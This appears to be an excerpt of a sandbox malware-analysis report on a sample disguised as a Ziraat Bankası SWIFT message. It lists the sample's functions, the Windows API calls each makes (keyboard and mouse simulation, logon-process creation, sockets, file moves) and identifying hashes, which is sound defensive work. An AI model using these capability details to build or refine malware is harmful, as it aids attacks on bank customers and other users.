Opcode Fuzzy Hash: 1827f71a050a52bc20fd0b9ecf0440b7307a1477b108c3e8388b496c90b30c1c
Instruction Fuzzy Hash: 69715DB1A00109EFCF14CF98CC89ABEBBB5FF86314F248159F915A6251C734AA51DFA1

Function 000C3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 000C3DE7
GetKeyboardState.USER32(?), ref: 000C3DFC
SetKeyboardState.USER32(?), ref: 000C3E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 000C3E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 000C3EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 000C3EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 000C3F13

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cb5f11b7c1b23486b29757cd1d9edfa8bf77a243bd53ae9c0230153fbac23f79
Instruction ID: c75a8d8c483442d6d60d996bf616cfd0d8c343d7a66019dab58b52f1cf1e8fec
Opcode Fuzzy Hash: cb5f11b7c1b23486b29757cd1d9edfa8bf77a243bd53ae9c0230153fbac23f79
Instruction Fuzzy Hash: A351DFA0A247D53DFB3643248C45FBE7EE96B06304F08888CF1D5568C3D2A8AEC5D760

Function 000C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 000C3C02
GetKeyboardState.USER32(?), ref: 000C3C17
SetKeyboardState.USER32(?), ref: 000C3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000C3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000C3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000C3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000C3D26

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 345487013478c3666cb671fad4809cfbd2ce3c2d298b978900fc102968ef2714
Instruction ID: a411c1b4610f0041605282ecd18ca35ba890a374e98a49cebd1585cc0f1ca62f
Opcode Fuzzy Hash: 345487013478c3666cb671fad4809cfbd2ce3c2d298b978900fc102968ef2714
Instruction Fuzzy Hash: 9B51D1A05247D53DFB3683648C56FBEBEE96B06300F08C48CE5D65A8C2D695EE84E760

Function 000C7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 000C7DBE
_wcsncpy.LIBCMT ref: 000C7DF3
_wcsncpy.LIBCMT ref: 000C7E25
_wcsncpy.LIBCMT ref: 000C7E58
_wcsncpy.LIBCMT ref: 000C7E9A
_wcsncpy.LIBCMT ref: 000C7ED4
_wcsncpy.LIBCMT ref: 000C7F03

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: cf9b8254aec6e561f4627d6bd2396d22c6888a7e6c8b0f0019d1133363a4ceca
Instruction ID: 5e9ef79fa99f2842b1e722575589e21db075545bd52a0693b2251c51490c781c
Opcode Fuzzy Hash: cf9b8254aec6e561f4627d6bd2396d22c6888a7e6c8b0f0019d1133363a4ceca
Instruction Fuzzy Hash: B1417366C1021876DF10EBF4C88AACF77AC9F06310F50897AE518E3163F634D61587A5

Function 000C5F85 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1

lstrcmpiW.KERNEL32(?,?), ref: 000C5FC9
_wcscmp.LIBCMT ref: 000C5FE7
MoveFileW.KERNEL32(?,?), ref: 000C6000

Part of subcall function 000C6318: GetFileAttributesW.KERNEL32(?,?,?,?,000C60C3), ref: 000C6369
Part of subcall function 000C6318: GetLastError.KERNEL32(?,?,?,000C60C3), ref: 000C6374
Part of subcall function 000C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C6388

_wcscat.LIBCMT ref: 000C6042
SHFileOperationW.SHELL32 ref: 000C60AA

Strings

\*.*, xrefs: 000C603C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$FullNamePath$AttributesCreateDirectoryErrorLastMoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1724171360-1173974218
Opcode ID: cf9f78363d315be9894e7ab7d87fc50655735401b6491d26f885a68b9005ab6b
Instruction ID: 1a2186ed9fe1343335db1444afd402677abb107ed9048b577fecda98d5c780cd
Opcode Fuzzy Hash: cf9f78363d315be9894e7ab7d87fc50655735401b6491d26f885a68b9005ab6b
Instruction Fuzzy Hash: D3311B72D043199ADF61EBA4D849FEE77B9AF4C300F1400AAA809E3153EA75D785CB51

Function 000E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000E8FE7
GetWindowLongW.USER32(00CFD920,000000F0), ref: 000E901A
GetWindowLongW.USER32(00CFD920,000000F0), ref: 000E904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000E9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000E90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 000E90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000E90D6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d0533ed4ee606db83bab88b5fc004bdbb8e1bb3daf3948dc305ae7e3f3409b76
Instruction ID: 1309ef187b1d5f770bcf39f81e8650886196d5ab4cbd6d1b62244602b2886258
Opcode Fuzzy Hash: d0533ed4ee606db83bab88b5fc004bdbb8e1bb3daf3948dc305ae7e3f3409b76
Instruction Fuzzy Hash: 0F315774600254EFDB60CF99DC88FA437E6FB4A314F154164F6199B6B2CBB2A880CB40

Function 000C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C0918
SysAllocString.OLEAUT32(00000000), ref: 000C091B
SysAllocString.OLEAUT32(?), ref: 000C0939
SysFreeString.OLEAUT32(?), ref: 000C0942
StringFromGUID2.OLE32(?,?,00000028), ref: 000C0967
SysAllocString.OLEAUT32(?), ref: 000C0975

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 632b4261bb590b25085cbabc099edc16b773a6b39da1f5351d3bfddbe768b5ef
Instruction ID: 39dc16a81db5685da8a4cdbd3b4d57007e95eeec6435c447d83b15d0d0dac2eb
Opcode Fuzzy Hash: 632b4261bb590b25085cbabc099edc16b773a6b39da1f5351d3bfddbe768b5ef
Instruction Fuzzy Hash: 0E216576601219AFEF109FA8DC88EBF77ECEB09360B408125F955DB161D670EC45CB60

Function 000C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000C2485
__wcsnicmp.LIBCMT ref: 000C24A6
__wcsnicmp.LIBCMT ref: 000C24C0

Strings

#requireadmin, xrefs: 000C24A0
#OnAutoItStartRegister, xrefs: 000C24BA
#notrayicon, xrefs: 000C247D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ea1cec463249c4f7331f1cbbd42873effe1b87685fa4162fbf41e2ce515babaf
Instruction ID: 98056c1591a79784e16e956cc72a415a3e848e021c37ca7dc4430673baf39ddf
Opcode Fuzzy Hash: ea1cec463249c4f7331f1cbbd42873effe1b87685fa4162fbf41e2ce515babaf
Instruction Fuzzy Hash: CA213732204A1167D734BB74AC12FFF73D8EF65310F10802DF44697482EB659982D3A5

Function 000C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C09F1
SysAllocString.OLEAUT32(00000000), ref: 000C09F4
SysAllocString.OLEAUT32 ref: 000C0A15
SysFreeString.OLEAUT32 ref: 000C0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 000C0A38
SysAllocString.OLEAUT32(?), ref: 000C0A46

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ef5fe022df4de38c583144f4983b91af964b65d7f59a19b3aab28afb9a728cc1
Instruction ID: 5f622068f45b32e82021b683f2bbe4e91220c18b49b8cf422a9111ee0d2090f4
Opcode Fuzzy Hash: ef5fe022df4de38c583144f4983b91af964b65d7f59a19b3aab28afb9a728cc1
Instruction Fuzzy Hash: 8A213275600204AFDB109BE8DC89EBE77ECEF083607408129F949CB661DAB0EC81D765

Function 0009CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0009CCF6
GetWindowRect.USER32(?,?), ref: 0009CD37
ScreenToClient.USER32(?,000000FF), ref: 0009CD5F
GetClientRect.USER32(?,?), ref: 0009CE8C
GetWindowRect.USER32(?,?), ref: 0009CEA5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 5e84639d228de236c70671fcbe7ac0bc1ccb7af3a98adde89045e9025f96cf49
Instruction ID: deea928d8932641a63e09e30b8874e9d8c115fd0a83c9f7996e11fd4235b1c46
Opcode Fuzzy Hash: 5e84639d228de236c70671fcbe7ac0bc1ccb7af3a98adde89045e9025f96cf49
Instruction Fuzzy Hash: F7B15B79900249DBEF60CFA8C480BEDB7F1FF08300F148529ED5AAB650DB70A950EB64

Function 000C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4B5B
IsMenu.USER32(00000000), ref: 000C4B7B
CreatePopupMenu.USER32 ref: 000C4BAF
GetMenuItemCount.USER32(000000FF), ref: 000C4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000C4C3E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: d15f7bc1fbd69233c0e7f76f0cbc94a6b286facbdf6b5fc6aa9d8f6b8448f0df
Instruction ID: 428f1835f885e1df167138f627f6534e1a8b1984fb5fe714c4e1834f26a3924c
Opcode Fuzzy Hash: d15f7bc1fbd69233c0e7f76f0cbc94a6b286facbdf6b5fc6aa9d8f6b8448f0df
Instruction Fuzzy Hash: 3851AC70601209EBDF60CFA8D898FEDBBF4BF45318F14815DE8559A2A1D3B1AD44CB51

Function 000D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D8E7C
WSAGetLastError.WSOCK32(00000000), ref: 000D8E89
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 000D8EC5
_strlen.LIBCMT ref: 000D8EF7
WSAGetLastError.WSOCK32(00000000), ref: 000D8F6A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 747e942f3e0e5c408589a9e856dcc77264dbd1f0c0bd91c50921e4cbb93c3817
Instruction ID: 0d92d266e08d874aa14cbf82e43709b342a9b7604ca40a9bb242f53a009da78a
Opcode Fuzzy Hash: 747e942f3e0e5c408589a9e856dcc77264dbd1f0c0bd91c50921e4cbb93c3817
Instruction Fuzzy Hash: 8441D271500204AFCB14EBA4DD95EEEB7B9EF18314F10866AF15A972D2DF30AE40CB60

Function 0009ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

BeginPaint.USER32(?,?,?), ref: 0009AC2A
GetWindowRect.USER32(?,?), ref: 0009AC8E
ScreenToClient.USER32(?,?), ref: 0009ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0009ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0009AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000FE673

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 77d9f5c352fc6f44f94042a846babe0279e10be1ec9a740e62712f3cf5e36244
Instruction ID: 13f48d54192c0f97402cdda3071878b23b51213256882080154b271ae1fd0df2
Opcode Fuzzy Hash: 77d9f5c352fc6f44f94042a846babe0279e10be1ec9a740e62712f3cf5e36244
Instruction Fuzzy Hash: 2741D770204304AFCB10DF64DC84FBA7BE8EB56370F140669F9A5876B1C7719885EBA2

Function 000EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00141628,00000000,00141628,00000000,00000000,00141628,?,000FDC5D,00000000,?,00000000,00000000,00000000,?,000FDAD1,00000004), ref: 000EE40B
EnableWindow.USER32(00000000,00000000), ref: 000EE42F
ShowWindow.USER32(00141628,00000000), ref: 000EE48F
ShowWindow.USER32(00000000,00000004), ref: 000EE4A1
EnableWindow.USER32(00000000,00000001), ref: 000EE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000EE4E8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ca54dcb0e0726407b854b2b1019d439f84286f1c254f3f013483880188e4aea9
Instruction ID: 2c45af9e684d57d090c08e50a45a1a1b73ff29a485f44f1e5a9cb865f410c97c
Opcode Fuzzy Hash: ca54dcb0e0726407b854b2b1019d439f84286f1c254f3f013483880188e4aea9
Instruction Fuzzy Hash: 8B4180746015C8EFDB62CF25C499B947BE1BF09304F2881A9FA58AF2E2C771E841CB51

Function 000C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 000C98D1

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000C9908
EnterCriticalSection.KERNEL32(?), ref: 000C9924
LeaveCriticalSection.KERNEL32(?), ref: 000C999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000C99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 000C99D2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 96527611bb51146e02d888d17d6533dc8f21e6783fe77f801659f7b8bfb00acb
Instruction ID: 410d9dc983c158b8251cc8f869b0455e727503d7a2fe6f904db7f3f91d3c4ac1
Opcode Fuzzy Hash: 96527611bb51146e02d888d17d6533dc8f21e6783fe77f801659f7b8bfb00acb
Instruction Fuzzy Hash: 85313031900105EBDF109F95DC85EAE77B8FF45710B148069F905AB246D770DE54DBA0

Function 000D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,000D77F4,?,?,00000000,00000001), ref: 000D9B53

Part of subcall function 000D6544: GetWindowRect.USER32(?,?), ref: 000D6557

GetDesktopWindow.USER32 ref: 000D9B7D
GetWindowRect.USER32(00000000), ref: 000D9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 000D9BB6

Part of subcall function 000C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0

GetCursorPos.USER32(?), ref: 000D9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000D9C44

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 8e6277627409411394104c276f0b096743ca2ebe3a46875e5246b83c654432ca
Instruction ID: 213918cf9d22512e443be4fbec4f3e0d521bf084b363c8f0e7fa827c9ab12e25
Opcode Fuzzy Hash: 8e6277627409411394104c276f0b096743ca2ebe3a46875e5246b83c654432ca
Instruction Fuzzy Hash: DB31C172104305ABC710DF68DC49F9AB7E9FF88314F00091AF589E7282DB71E948CBA2

Function 000BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000BAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 000BAFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000BAFC4
CloseHandle.KERNEL32(00000004), ref: 000BAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BAFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 000BB012

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

